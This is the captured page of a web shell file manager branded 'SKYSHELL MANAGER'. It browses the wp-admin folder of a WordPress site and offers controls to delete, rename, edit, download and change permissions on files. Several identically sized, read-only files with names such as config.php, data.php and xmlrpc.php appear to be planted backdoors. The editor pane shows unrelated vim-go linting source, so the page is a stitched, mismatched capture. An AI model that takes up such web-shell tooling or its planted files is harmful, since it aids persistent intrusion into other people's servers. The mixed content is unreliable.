📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
data.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: lint.vim
if !exists("g:go_metalinter_command") let g:go_metalinter_command = "" endif if !exists("g:go_metalinter_autosave_enabled") let g:go_metalinter_autosave_enabled = ['vet', 'golint'] endif if !exists("g:go_metalinter_enabled") let g:go_metalinter_enabled = ['vet', 'golint', 'errcheck'] endif if !exists("g:go_metalinter_deadline") let g:go_metalinter_deadline = "5s" endif if !exists("g:go_golint_bin") let g:go_golint_bin = "golint" endif if !exists("g:go_errcheck_bin") let g:go_errcheck_bin = "errcheck" endif function! go#lint#Gometa(autosave, ...) abort if a:0 == 0 let goargs = shellescape(expand('%:p:h')) else let goargs = go#util#Shelljoin(a:000) endif let meta_command = "gometalinter --disable-all" if a:autosave || empty(g:go_metalinter_command) let bin_path = go#path#CheckBinPath("gometalinter") if empty(bin_path) return endif if a:autosave " include only messages for the active buffer let meta_command .= " --include='^" . expand('%:p') . ".*$'" endif " linters let linters = a:autosave ? g:go_metalinter_autosave_enabled : g:go_metalinter_enabled for linter in linters let meta_command .= " --enable=".linter endfor " deadline let meta_command .= " --deadline=" . g:go_metalinter_deadline " path let meta_command .= " " . goargs else " the user wants something else, let us use it. let meta_command = g:go_metalinter_command endif " comment out the following two lines for debugging " echo meta_command " return let out = go#tool#ExecuteInDir(meta_command) let l:listtype = "quickfix" if go#util#ShellError() == 0 redraw | echo call go#list#Clean(l:listtype) call go#list#Window(l:listtype) echon "vim-go: " | echohl Function | echon "[metalinter] PASS" | echohl None else " GoMetaLinter can output one of the two, so we look for both: " <file>:<line>:[<column>]: <message> (<linter>) " <file>:<line>:: <message> (<linter>) " This can be defined by the following errorformat: let errformat = "%f:%l:%c:%t%*[^:]:\ %m,%f:%l::%t%*[^:]:\ %m" " Parse and populate our location list call go#list#ParseFormat(l:listtype, errformat, split(out, "\n")) let errors = go#list#Get(l:listtype) call go#list#Window(l:listtype, len(errors)) if !a:autosave call go#list#JumpToFirst(l:listtype) endif endif endfunction " Golint calls 'golint' on the current directory. Any warnings are populated in " the location list function! go#lint#Golint(...) abort let bin_path = go#path#CheckBinPath(g:go_golint_bin) if empty(bin_path) return endif if a:0 == 0 let goargs = shellescape(expand('%')) else let goargs = go#util#Shelljoin(a:000) endif let out = go#util#System(bin_path . " " . goargs) if empty(out) echon "vim-go: " | echohl Function | echon "[lint] PASS" | echohl None return endif let l:listtype = "quickfix" call go#list#Parse(l:listtype, out) let errors = go#list#Get(l:listtype) call go#list#Window(l:listtype, len(errors)) call go#list#JumpToFirst(l:listtype) endfunction " Vet calls 'go vet' on the current directory. Any warnings are populated in " the location list function! go#lint#Vet(bang, ...) call go#cmd#autowrite() echon "vim-go: " | echohl Identifier | echon "calling vet..." | echohl None if a:0 == 0 let out = go#tool#ExecuteInDir('go vet') else let out = go#tool#ExecuteInDir('go tool vet ' . go#util#Shelljoin(a:000)) endif let l:listtype = "quickfix" if go#util#ShellError() != 0 let errors = go#tool#ParseErrors(split(out, '\n')) call go#list#Populate(l:listtype, errors) call go#list#Window(l:listtype, len(errors)) if !empty(errors) && !a:bang call go#list#JumpToFirst(l:listtype) endif echon "vim-go: " | echohl ErrorMsg | echon "[vet] FAIL" | echohl None else call go#list#Clean(l:listtype) call go#list#Window(l:listtype) redraw | echon "vim-go: " | echohl Function | echon "[vet] PASS" | echohl None endif endfunction " ErrCheck calls 'errcheck' for the given packages. Any warnings are populated in " the location list function! go#lint#Errcheck(...) abort if a:0 == 0 let goargs = go#package#ImportPath(expand('%:p:h')) if goargs == -1 echohl Error | echomsg "vim-go: package is not inside GOPATH src" | echohl None return endif else let goargs = go#util#Shelljoin(a:000) endif let bin_path = go#path#CheckBinPath(g:go_errcheck_bin) if empty(bin_path) return endif echon "vim-go: " | echohl Identifier | echon "errcheck analysing ..." | echohl None redraw let command = bin_path . ' -abspath ' . goargs let out = go#tool#ExecuteInDir(command) let l:listtype = "quickfix" if go#util#ShellError() != 0 let errformat = "%f:%l:%c:\ %m, %f:%l:%c\ %#%m" " Parse and populate our location list call go#list#ParseFormat(l:listtype, errformat, split(out, "\n")) let errors = go#list#Get(l:listtype) if empty(errors) echohl Error | echomsg "GoErrCheck returned error" | echohl None echo out return endif if !empty(errors) call go#list#Populate(l:listtype, errors) call go#list#Window(l:listtype, len(errors)) if !empty(errors) call go#list#JumpToFirst(l:listtype) endif endif else call go#list#Clean(l:listtype) call go#list#Window(l:listtype) echon "vim-go: " | echohl Function | echon "[errcheck] PASS" | echohl None endif endfunction function! go#lint#ToggleMetaLinterAutoSave() if get(g:, "go_metalinter_autosave", 0) let g:go_metalinter_autosave = 0 call go#util#EchoProgress("auto metalinter disabled") return end let g:go_metalinter_autosave = 1 call go#util#EchoProgress("auto metalinter enabled") endfunction " vim: sw=2 ts=2 et
Save